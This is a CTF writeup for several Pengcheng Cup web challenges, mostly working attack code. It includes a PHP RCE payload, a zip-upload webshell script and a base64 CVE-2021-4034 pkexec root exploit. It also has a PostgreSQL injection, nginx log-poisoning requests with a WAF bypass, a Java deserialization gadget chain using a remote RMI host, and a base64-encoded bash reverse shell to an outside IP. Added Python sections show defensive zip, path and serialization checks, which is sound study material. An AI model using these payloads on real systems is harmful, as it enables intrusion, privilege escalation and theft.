鹏城杯 (Pengcheng Cup)
Sneaking in a few challenges while the big guys were busy with Google CTF.
简单的php (Simple PHP)
This is literally the original challenge from https://xz.aliyun.com/t/9360, so just follow that writeup:
```text
code=[~%8C%86%8C%8B%9A%92][!%FF]([~%91%9A%87%8B][!%FF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][!%FF]()));
```
The bitwise-NOT'd bytes decode to `system(next(getallheaders()))`, so putting the command in the UA header gives RCE.
压缩包 (Zip archive)
Another one we had seen before: write an entry with an extremely long filename into the zip next to a shell, so that extraction throws an error but the shell file has already been extracted normally. Find the path and it's straight RCE:
```python
import zipfile
import io
import requests
import base64

# Build the archive in memory: the PHP shell first, then an entry whose name is far too
# long, so the server-side extraction errors out after the shell is already on disk.
mf = io.BytesIO()
with zipfile.ZipFile(mf, mode="w", compression=zipfile.ZIP_STORED) as zf:
    zf.writestr('1.php', b'@<?php eval($_POST[1])?>')
    zf.writestr('A' * 5000, b'AAAAA')
with open("shell.zip", "wb") as f:
    f.write(mf.getvalue())

# Upload the archive base64-encoded in the "content" field.
url = 'http://192.168.1.110:8521/'
with open("shell.zip", "rb") as f:
    content = f.read()
data = {"content": base64.b64encode(content)}
print(data)
re = requests.post(url=url, data=data)
print(re.text)
```
高手高手高高手 (Master of masters)
Git source leak; audit the code. In extension.php there is zip extraction, with no check at all on the files inside the archive:
```php
$zip = new ZipArchive;
if($zip->open($_FILES['extension-upload']['tmp_name']) === TRUE)
{
    $zip->extractTo(NAVIGATE_PATH.'/plugins/'.$extension_name);
    $zip->close();
    $layout->navigate_notification(t(374, "Item installed successfully."), false);
}
```
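Both archive challenges (the oversized-filename zip above and this `extractTo` with no entry checks) boil down to the server trusting whatever is inside the zip. Below is an added defensive example, written for this writeup and not part of the writeup's own scripts or of the target application: a Python validator that inspects every entry name before anything is extracted, rejecting overlong names, path traversal and server-side script extensions, and runs against a constructed copy of the shell-plus-5000-'A' archive. The policy constants (`MAX_NAME_LEN`, `MAX_ENTRIES`, `ALLOWED_EXT`) are assumptions made for the example.

```python
import io
import posixpath
import zipfile

# Constructed policy for plugin archives (assumptions for this example, not the app's rules).
MAX_NAME_LEN = 255      # reject overlong names instead of letting the extractor choke on them
MAX_ENTRIES = 1000
ALLOWED_EXT = {".js", ".css", ".json", ".html", ".txt", ".png"}   # no server-side scripts


def validate_zip_entries(data):
    """Return the list of reasons to reject the archive; an empty list means it is clean.
    Every entry is inspected before a single byte is written to disk."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
        if len(infos) > MAX_ENTRIES:
            problems.append(f"too many entries ({len(infos)})")
        for info in infos:
            name = info.filename
            if len(name) > MAX_NAME_LEN:
                problems.append(f"entry name too long ({len(name)} chars)")
                continue
            if name.startswith("/") or "\\" in name or "\x00" in name:
                problems.append(f"absolute, backslash or NUL path: {name[:40]!r}")
                continue
            # Normalise so 'a/../../x' is seen for what it is, then refuse anything that climbs out.
            norm = posixpath.normpath(name)
            if norm == ".." or norm.startswith("../"):
                problems.append(f"path traversal: {name!r}")
                continue
            if info.is_dir():
                continue
            ext = posixpath.splitext(norm)[1].lower()
            if ext not in ALLOWED_EXT:
                problems.append(f"disallowed file type: {name!r}")
    return problems


def safe_extract(data, target_dir):
    """All-or-nothing: extract only when the whole archive passed validation."""
    problems = validate_zip_entries(data)
    if problems:
        raise ValueError("rejected archive: " + "; ".join(problems))
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        zf.extractall(target_dir)


def build_zip(entries):
    """Build an in-memory archive from {name: content} (used for the constructed samples)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, mode="w", compression=zipfile.ZIP_STORED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: the writeup's shell-plus-oversized-name archive, a clean plugin,
# and a traversal attempt. The "shell" is only a placeholder comment.
MALICIOUS_ZIP = build_zip({"1.php": b"<?php /* webshell placeholder */ ?>", "A" * 5000: b"AAAAA"})
BENIGN_ZIP = build_zip({"plugin/manifest.json": b"{}", "plugin/main.js": b"// ok"})
TRAVERSAL_ZIP = build_zip({"../../config.json": b"{}"})

if __name__ == "__main__":
    for label, archive in [("malicious", MALICIOUS_ZIP), ("benign", BENIGN_ZIP), ("traversal", TRAVERSAL_ZIP)]:
        print(f"{label}: {validate_zip_entries(archive) or 'OK'}")
```

The important design point is that validation runs over the whole central directory before `extractall`; the challenge's bug is precisely that extraction and the (absent) check happened entry by entry, so the shell was on disk before the oversized name blew things up.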
Weak backend credentials: admin:admin123.
Under Extensions there is an option to load a local plugin. Put the shell in a zip and upload it, and the webshell is saved under the /plugins directory. Connect with AntSword, get a reverse shell, and find that the flag is neither in / nor in any other folder. Time to escalate privileges:
pkexec is present, so use a ready-made exploit (the base64 below decodes to a CVE-2021-4034 PoC):
```shell
echo "LyoKICogYmxhc3R5LXZzLXBrZXhlYy5jIC0tIGJ5IGJsYXN0eSA8cGV0ZXJAaGF4eC5pbj4gCiAqIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQogKiBQb0MgZm9yIENWRS0yMDIxLTQwMzQsIHNob3V0IG91dCB0byBRdWFseXMKICoKICogY3RmIHF1YWxpdHkgZXhwbG9pdAogKgogKiBibGEgYmxhIGlycmVzcG9uc2libGUgZGlzY2xvc3VyZQogKgogKiAtLSBibGFzdHkgLy8gMjAyMi0wMS0yNQogKi8KCiNpbmNsdWRlIDxzdGRpby5oPgojaW5jbHVkZSA8c3RkbGliLmg+CiNpbmNsdWRlIDxzdHJpbmcuaD4KI2luY2x1ZGUgPHVuaXN0ZC5oPgojaW5jbHVkZSA8c3lzL3N0YXQuaD4KI2luY2x1ZGUgPHN5cy90eXBlcy5oPgojaW5jbHVkZSA8ZmNudGwuaD4KCnZvaWQgZmF0YWwoY2hhciAqZikgewogICAgcGVycm9yKGYpOwogICAgZXhpdCgtMSk7Cn0KCnZvaWQgY29tcGlsZV9zbygpIHsKICAgIEZJTEUgKmYgPSBmb3BlbigicGF5bG9hZC5jIiwgIndiIik7CiAgICBpZiAoZiA9PSBOVUxMKSB7CiAgICAgICAgZmF0YWwoImZvcGVuIik7CiAgICB9CgogICAgY2hhciBzb19jb2RlW109CiAgICAgICAgIiNpbmNsdWRlIDxzdGRpby5oPlxuIgogICAgICAgICIjaW5jbHVkZSA8c3RkbGliLmg+XG4iCiAgICAgICAgIiNpbmNsdWRlIDx1bmlzdGQuaD5cbiIKICAgICAgICAidm9pZCBnY29udigpIHtcbiIKICAgICAgICAiICByZXR1cm47XG4iCiAgICAgICAgIn1cbiIKICAgICAgICAidm9pZCBnY29udl9pbml0KCkge1xuIgogICAgICAgICIgIHNldHVpZCgwKTsgc2V0ZXVpZCgwKTsgc2V0Z2lkKDApOyBzZXRlZ2lkKDApO1xuIgogICAgICAgICIgIHN0YXRpYyBjaGFyICphX2FyZ3ZbXSA9IHsgXCJzaFwiLCBOVUxMIH07XG4iCiAgICAgICAgIiAgc3RhdGljIGNoYXIgKmFfZW52cFtdID0geyBcIlBBVEg9L2JpbjovdXNyL2Jpbjovc2JpblwiLCBOVUxMIH07XG4iCiAgICAgICAgIiAgZXhlY3ZlKFwiL2Jpbi9zaFwiLCBhX2FyZ3YsIGFfZW52cCk7XG4iCiAgICAgICAgIiAgZXhpdCgwKTtcbiIKICAgICAgICAifVxuIjsKCiAgICBmd3JpdGUoc29fY29kZSwgc3RybGVuKHNvX2NvZGUpLCAxLCBmKTsKICAgIGZjbG9zZShmKTsKCiAgICBzeXN0ZW0oImdjYyAtbyBwYXlsb2FkLnNvIC1zaGFyZWQgLWZQSUMgcGF5bG9hZC5jIik7Cn0KCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsKICAgIHN0cnVjdCBzdGF0IHN0OwogICAgY2hhciAqYV9hcmd2W109eyBOVUxMIH07CiAgICBjaGFyICphX2VudnBbXT17CiAgICAgICAgImxvbCIsCiAgICAgICAgIlBBVEg9R0NPTlZfUEFUSD0uIiwKICAgICAgICAiTENfTUVTU0FHRVM9ZW5fVVMuVVRGLTgiLAogICAgICAgICJYQVVUSE9SSVRZPS4uL0xPTCIsCiAgICAgICAgIkdJT19VU0VfVkZTPSIsCiAgICAgICAgTlVMTAogICAgfTsKCiAgICBwcmludGYoIlt+XSBjb21waWxlIGhlbHBlci4uXG4iKTsKICAgIGNvbXBpbGVfc28oKTsKCiAgICBpZiAoc3RhdCgiR0NPTlZfUEFUSD0uIiwgJnN0KSA8IDApIHsKICAgICAgICBpZihta2RpcigiR0NPTlZfUEFUSD0uIiwgMDc3NykgPCAwKSB7CiAgICAgICAgICAgIGZhdGFsKCJta2RpciIpOwogICAgICAgIH0KICAgICAgICBpbnQgZmQgPSBvcGVuKCJHQ09OVl9QQVRIPS4vbG9sIiwgT19DUkVBVHxPX1JEV1IsIDA3NzcpOyAKICAgICAgICBpZiAoZmQgPCAwKSB7CiAgICAgICAgICAgIGZhdGFsKCJvcGVuIik7CiAgICAgICAgfQogICAgICAgIGNsb3NlKGZkKTsKICAgIH0KCiAgICBpZiAoc3RhdCgibG9sIiwgJnN0KSA8IDApIHsKICAgICAgICBpZihta2RpcigibG9sIiwgMDc3NykgPCAwKSB7CiAgICAgICAgICAgIGZhdGFsKCJta2RpciIpOwogICAgICAgIH0KICAgICAgICBGSUxFICpmcCA9IGZvcGVuKCJsb2wvZ2NvbnYtbW9kdWxlcyIsICJ3YiIpOwogICAgICAgIGlmKGZwID09IE5VTEwpIHsKICAgICAgICAgICAgZmF0YWwoImZvcGVuIik7CiAgICAgICAgfQogICAgICAgIGZwcmludGYoZnAsICJtb2R1bGUgIFVURi04Ly8gICAgSU5URVJOQUwgICAgLi4vcGF5bG9hZCAgICAyXG4iKTsKICAgICAgICBmY2xvc2UoZnApOwogICAgfQoKICAgIHByaW50ZigiW35dIG1heWJlIGdldCBzaGVsbCBub3c/XG4iKTsKCiAgICBleGVjdmUoIi91c3IvYmluL3BrZXhlYyIsIGFfYXJndiwgYV9lbnZwKTsKfQ==" | base64 -d > /tmp/a.c
gcc /tmp/a.c -o exp
chmod a+x ./exp
./exp
```
That gives root. The flag is then found under /root, but it turns out to be encoded:
Shift by 32 to get the flag.
easygo
PostgreSQL injection with no filtering at all, so go straight for error-based injection:
```text
192.168.1.115:8080/juice/1'AND 7778=CAST((SELECT flag FROM public.super_secret_table limit 1)::text AS NUMERIC)--
```
简单包含 (Simple include)
Nginx log injection.
First inject `<?=show_source('/var/www/html/flag.php');?>` through the UA header.
Send the request:
```http
POST / HTTP/1.1
Host: 192.168.1.113
User-Agent: <?=show_source('/var/www/html/flag.php');?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://192.168.1.113
Connection: close
Referer: http://192.168.1.113/php.bak?
Upgrade-Insecure-Requests: 1

flag=/etc/hosts
```
Then use `/xxx/../` in the include path to get past the WAF:
```http
POST / HTTP/1.1
Host: 192.168.1.113
User-Agent: qwe
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://192.168.1.113
Connection: close
Referer: http://192.168.1.113/php.bak?
Upgrade-Insecure-Requests: 1

flag=/var/ran/../log/nginx/access.log
```
And the flag comes out:
PCL{bc58644f-f757-11ec-9edf-5224002d2b29}
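The WAF in this challenge is fooled by `/var/ran/../log/...` because it matches the raw parameter string instead of the path the include will actually open. As an added example (my own, not from the writeup or the challenge), here is a Python comparison of that kind of substring denylist with a canonicalise-then-allowlist check; `ALLOWED_BASE`, `BLOCKED_SUBSTRINGS` and the sample request values are constructed for the demonstration.

```python
import posixpath

# Constructed policy: includes may only come from this directory.
ALLOWED_BASE = "/var/www/html/public"
# Constructed denylist, the kind of substring filter the challenge WAF appears to apply.
BLOCKED_SUBSTRINGS = ("/var/log", "/etc/", "/proc/")


def naive_waf_allows(path):
    """Denylist applied to the raw parameter: what the bypass above gets around."""
    return not any(bad in path for bad in BLOCKED_SUBSTRINGS)


def canonicalize(path):
    """Resolve '.', '..' and repeated slashes lexically before any policy decision.
    Production code should additionally os.path.realpath() the result so that a
    symlink cannot point back out of the allowed directory."""
    if "\x00" in path:
        return None
    return posixpath.normpath(path)


def canonical_allows(path):
    """Allowlist on the canonical path: it must be an absolute path inside ALLOWED_BASE."""
    canon = canonicalize(path)
    if canon is None or not canon.startswith("/"):
        return False
    return canon == ALLOWED_BASE or canon.startswith(ALLOWED_BASE + "/")


# Constructed values for the `flag=` parameter, including the writeup's WAF bypass.
SAMPLE_REQUESTS = [
    "/var/www/html/public/page.php",
    "/var/log/nginx/access.log",
    "/var/ran/../log/nginx/access.log",
    "/var/www/html/public/../../../../root/flag",
    "/var/www/html/public/a\x00.txt",
]


def compare():
    """Map each sample to (naive verdict, canonical verdict, canonical path)."""
    return {p: (naive_waf_allows(p), canonical_allows(p), canonicalize(p)) for p in SAMPLE_REQUESTS}


if __name__ == "__main__":
    for path, (naive, canon_ok, canon) in compare().items():
        print(f"{path!r:50} naive={naive!s:5} canonical={canon_ok!s:5} -> {canon}")
```

The fourth sample is the reason an allowlist is preferable to extending the denylist: it contains none of the blocked substrings, yet canonicalises to `/root/flag`. With the allowlist, only paths that resolve under the intended directory ever reach the include.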
can_u_login
An original challenge from 第五空间 (5Space CTF), but the target box was broken and couldn't be attacked until the next morning, so a challenge was lost XD
Ez_Java (reproduced afterwards)
Was so close, but it was too late so I just went to sleep, and couldn't get up the next day XD. The blacklist is long; looks like they banned the CC chains outright:
```java
this.add("javax.management.BadAttributeValueExpException");
this.add("org.apache.commons.collections.keyvalue.TiedMapEntry");
this.add("org.apache.commons.collections.functors.ChainedTransformer");
this.add("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
this.add("org.apache.commons.collections4.functors.ChainedTransformer");
this.add("org.apache.commons.collections4.functors.InstantiateTransformer");
this.add("com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter");
```
Then someone on 知识星球 happened to have mentioned using the CB chain for JNDI injection. Here is the exploit straight up:
```java
package com.example.Ez_Java;

import com.sun.rowset.JdbcRowSetImpl;
import org.apache.commons.beanutils.BeanComparator;

import java.io.*;
import java.lang.reflect.Field;
import java.sql.SQLException;
import java.util.Base64;
import java.util.PriorityQueue;

public class Exp {
    public static void main(String[] args) throws IllegalAccessException, NoSuchFieldException, ClassNotFoundException, IOException, SQLException {
        BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
        PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
        queue.add("1");
        queue.add("2");

        Field field2 = comparator.getClass().getDeclaredField("property");
        field2.setAccessible(true);
        field2.set(comparator, "parameterMetaData");

        JdbcRowSetImpl test = new JdbcRowSetImpl();
        test.setDataSourceName("rmi://47.96.173.116:8888/Object");

        Field field = queue.getClass().getDeclaredField("queue");
        field.setAccessible(true);
        Object[] queryArray = (Object[]) field.get(queue);
        queryArray[0] = test;

        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(queue);
        System.out.println(new String(Base64.getEncoder().encode(bos.toByteArray())));

        // ByteArrayInputStream bis = new ByteArrayInputStream(bos.toByteArray());
        // ObjectInputStream ois = new ObjectInputStream(bis);
        // ois.readObject();
    }
}
```
The principle is much the same as the original CB chain, but TemplatesImpl is banned, so the getOutputProperties getter is swapped for JdbcRowSetImpl's getParameterMetaData, which is what triggers the JNDI injection.
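The lesson from Ez_Java is that a class-name denylist only blocks the gadgets its author thought of; BeanComparator and JdbcRowSetImpl are simply not on it. As an added example (my own, not the challenge's code and not any library's API), here is a small Python scanner that pulls class names out of the TC_CLASSDESC records of a Java serialization stream and shows the challenge denylist letting the chain through while an allowlist blocks it. The stream it scans is constructed by hand (class headers only, not a real serialized PriorityQueue) and `ALLOWLIST` is an assumed application-specific set; a real deployment would enforce the same allowlist in the JVM with `java.io.ObjectInputFilter` rather than by scanning bytes.

```python
import base64
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72

# Denylist copied from the challenge source quoted above.
DENYLIST = {
    "javax.management.BadAttributeValueExpException",
    "org.apache.commons.collections.keyvalue.TiedMapEntry",
    "org.apache.commons.collections.functors.ChainedTransformer",
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    "org.apache.commons.collections4.functors.ChainedTransformer",
    "org.apache.commons.collections4.functors.InstantiateTransformer",
    "com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter",
}
# Assumed allowlist: the only classes this (hypothetical) application ever deserialises.
ALLOWLIST = {"java.lang.String", "java.util.HashMap", "com.example.app.SessionToken"}


def _looks_like_class_name(raw):
    """Dotted Java identifiers only; array descriptors like '[Ljava.lang.Object;' are skipped."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return False
    parts = text.split(".")
    if len(parts) < 2:
        return False
    for part in parts:
        if not part or not (part[0].isalpha() or part[0] in "_$"):
            return False
        if not all(c.isalnum() or c in "_$" for c in part):
            return False
    return True


def extract_class_names(stream):
    """Heuristic scan of a Java serialization stream: each TC_CLASSDESC (0x72) marker is
    followed by the class name as modified UTF-8 (2-byte big-endian length + bytes).
    The full grammar is not parsed; this is enough to list the classes a payload
    asks the JVM to instantiate."""
    if not stream.startswith(STREAM_MAGIC):
        raise ValueError("not a Java serialization stream")
    names = []
    i = len(STREAM_MAGIC)
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            (n,) = struct.unpack(">H", stream[i + 1:i + 3])
            candidate = stream[i + 3:i + 3 + n]
            if n and len(candidate) == n and _looks_like_class_name(candidate):
                names.append(candidate.decode("ascii"))
                i += 3 + n
                continue
        i += 1
    return names


def scan_base64(blob):
    """Convenience wrapper for payloads handed around as base64, like the Exp output above."""
    return extract_class_names(base64.b64decode(blob))


def blocked_by_denylist(names):
    return [n for n in names if n in DENYLIST]


def blocked_by_allowlist(names):
    return [n for n in names if n not in ALLOWLIST]


def build_sample_stream(class_names):
    """Constructed input: one TC_OBJECT/TC_CLASSDESC header per class with zero fields.
    It is not a real serialized PriorityQueue, only enough structure for the scanner."""
    out = bytearray(STREAM_MAGIC)
    for name in class_names:
        encoded = name.encode("ascii")
        out += bytes([TC_OBJECT, TC_CLASSDESC]) + struct.pack(">H", len(encoded)) + encoded
        out += b"\x00" * 8        # serialVersionUID (placeholder)
        out += b"\x02"            # classDescFlags: SC_SERIALIZABLE
        out += b"\x00\x00"        # field count 0
        out += b"\x78\x70"        # TC_ENDBLOCKDATA, TC_NULL (no superclass descriptor)
    return bytes(out)


CB_CHAIN_SAMPLE = build_sample_stream([
    "java.util.PriorityQueue",
    "org.apache.commons.beanutils.BeanComparator",
    "com.sun.rowset.JdbcRowSetImpl",
])
CB_CHAIN_SAMPLE_B64 = base64.b64encode(CB_CHAIN_SAMPLE).decode("ascii")

if __name__ == "__main__":
    found = scan_base64(CB_CHAIN_SAMPLE_B64)
    print("classes in stream:", found)
    print("denylist blocks:  ", blocked_by_denylist(found))   # nothing: the chain slips through
    print("allowlist blocks: ", blocked_by_allowlist(found))  # every class of the gadget chain
```

Because the scanner only looks for class descriptors, it is a triage tool for captured payloads, not a substitute for the JVM-side filter; but it makes the denylist-versus-allowlist difference concrete on exactly the classes this exploit relies on.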
The challenge then needs a high-JDK-version bypass. Just grab a tool: https://github.com/wyzxxz/jndi_tool
Run it on the VPS:
```shell
java -cp jndi_tool.jar jndi.EvilRMIServer 8888 1099 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ni4xNzMuMTE2LzIzMzMgMD4mMQ==}|{base64,-d}|{bash,-i}" el-win/el-linux/groovy
```
And that's RCE.